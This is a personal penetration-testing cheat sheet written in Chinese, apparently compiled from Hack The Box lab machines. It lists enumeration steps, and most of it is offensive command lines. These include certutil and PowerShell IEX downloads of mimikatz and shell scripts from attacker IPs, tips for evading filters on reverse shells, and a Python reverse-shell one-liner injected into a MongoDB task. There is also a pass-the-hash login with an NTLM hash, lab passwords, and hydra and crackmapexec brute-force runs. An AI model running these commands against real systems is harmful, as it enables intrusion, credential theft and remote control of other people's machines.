1.nmap全端口,script,udp
2.enum4linux 測試
3.nikto
4.davtest
5.每個資料夾gobuster
6.使用不同gobuster字典
7.使用burpsuite的spider遍利目力
8.找到服務後,嘗試找到服務的原本,查看配置文件或是版本訊息(官網或GitHub)
9.查看每個html的source
10.弱密碼手動嘗試所有服務ssh,ftp,web






###widnows下載文件
certutil.exe -urlcache -split -f http://10.10.14.8/mimikatz_trunk.exe mimikatz_trunk.exe
(New-Object Net.Webclient).downloadFile('http://10.10.14.8/mimikatz.exe', 'mimikatz.exe')

###reverse shell回彈不生效
1.將ip轉成hex,避免.問題
2.整串代碼用url encode後嘗試
3.整串代碼用base64後嘗試
4.nc多嘗試幾個版本
5.winpeas.exe多嘗試幾個
6.certutil及curl可以嘗試下載
7.不同端口測試(測試22,80,443)
8.嘗試將reverse.ps1轉馬成base64
9.cat Invoke-PowerShellTcp.ps1 | iconv -t UTF-16LE |base64 -w0
  powershell -enc 將複製的base64code貼上



###windows登入連線指令
evil-winrm -u 'Administrator' -p  'kidvscat_admin_@123' -i atom.htb
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109  cmd

###windows reverse shell
windows/meterpreter/reverse_tcp stage斜線是穩定,給mutil handler使用,容量小
windows/meterpreter_reverse_tcp stageless底線是不穩定,容量大
"cmd /c powershell -c IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.26/shell.ps1')"


###數據庫操作指令
指定本地 mysql -u root -p -h 127.0.0.1
不做互動式 mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
PostgreSQL數據庫 psql -h 192.168.69.56 -U postgres -p 5432
MS-DB sqsh -S 10.129.1.183 -U sa -P GWE3V65#6KFH93@4GWTG2G
mongo -u mark -p 5AYRft73VtFpc84k scheduler
db.tasks.insert({"cmd":"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.26\",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")';"})

###tunnel隧道windows
.\chisel.exe client 10.10.14.45:9002 R:3306:localhost:3306 R:8888:localhost:8888
./chisel server --reverse --port 9002


###nfs
有發現nfs port的會 要showmount查看

###掃出來的每個port都要仔細看,查詢是什麼用途
###根據port直接pycharm搜紀錄


###數據庫服務嘗試弱密碼登入及暴力破解

###先用common在用medium2.3

###任何不能的事情都嘗試其他方法

###下載路徑下所有東西
wget -r http://bank.htb/balance-transfer/

###SMB查看
smbmap -H 10.129.139.203 -R --depth 5
smbclient -L 192.168.37.108
smbmap -R  -H 10.129.86.187 -u  SVC_TGS  -p GPPstillStandingStrong2k18
smbclient -N -U guest //10.10.68.86/milesdyson

### SMB掛載   ippsec.rocks搜索cifs
sudo mount -t cifs -o username=root //10.129.164.132/backups /mnt/smb
sudo mount -t nfs -o vers=3 10.129.112.47:/var/nfsshare /mnt/smb
sudo mount -t nfs 10.129.112.47:/opt  /mnt/smb


###VHD掛載    ippsec.rocks搜索VHD
guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd

###DNS Zone transfer
nslookup
server xxx.xxx.xxx.xxx
127.0.0.1


### wfuzz測試特殊字元
wfuzz -c -u http://10.129.134.249/weather/forecast?city=FUZZ  -w /usr/share/wordlists/SecLists/Fuzzing/special-chars.txt



###暴力破解
/opt/crackmapexec/poetry run crackmapexec ssh 10.129.1.145  -u ~/timmy/hackthebox/Openadmin/users.txt -p ~/timmy/hackthebox/Openadmin/passwords.txt
/opt/crackmapexec/poetry run crackmapexec smb 10.129.48.113 -u ~/timmy/hackthebox/ServMon/users.txt -p ~/timmy/hackthebox/ServMon/passwords.txt
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 10.129.1.83 http-post-form "/login.php:username=admin&password=^PASS^:Wrong identification"
hydra -L passlist  10.129.164.53 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64


###ssh key 密碼破解
將private_key轉成可以破解的john hash格式

###根據指定字串生成密碼
crunch 15 15 -t Th4C00lTheacha^
hashcat --force password -r /usr/share/hashcat/rules/best64.rule --stdout > passwordlist.txt                                                                                                                                     255 ⨯


###檢查圖片隱藏內容
steghide info HackerAccessGranted.jpg
steghide  --extract -sf HackerAccessGranted.jpg
binwalk merlin.jpg
binwalk -Me merlin.jpg


###kdbx檔案打開方式
找到tim.kdbx 必須使用keepassX才能打開

###fuzz主機頭,id
/opt/ffuf/ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://schooled.htb/ -H 'Host: FUZZ.schooled.htb' -fs 20750
wfuzz -c -z range,0-50  http://moodle.schooled.htb/moodle/user/profile.php?id=FUZZ
wfuzz -c -z range,1-65535  http://10.129.100.15:60000/url.php?path=http://localhost:FUZZ


###查看緩存檔案swp
vim -r auth.php.swp


###nmap不出結果的話嘗試sudo



###zip檔案解密
zip2john hash64d > zippasshash